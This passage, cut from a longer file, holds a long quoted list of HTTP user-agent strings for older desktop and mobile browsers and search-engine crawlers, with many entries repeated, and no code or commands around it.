Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; 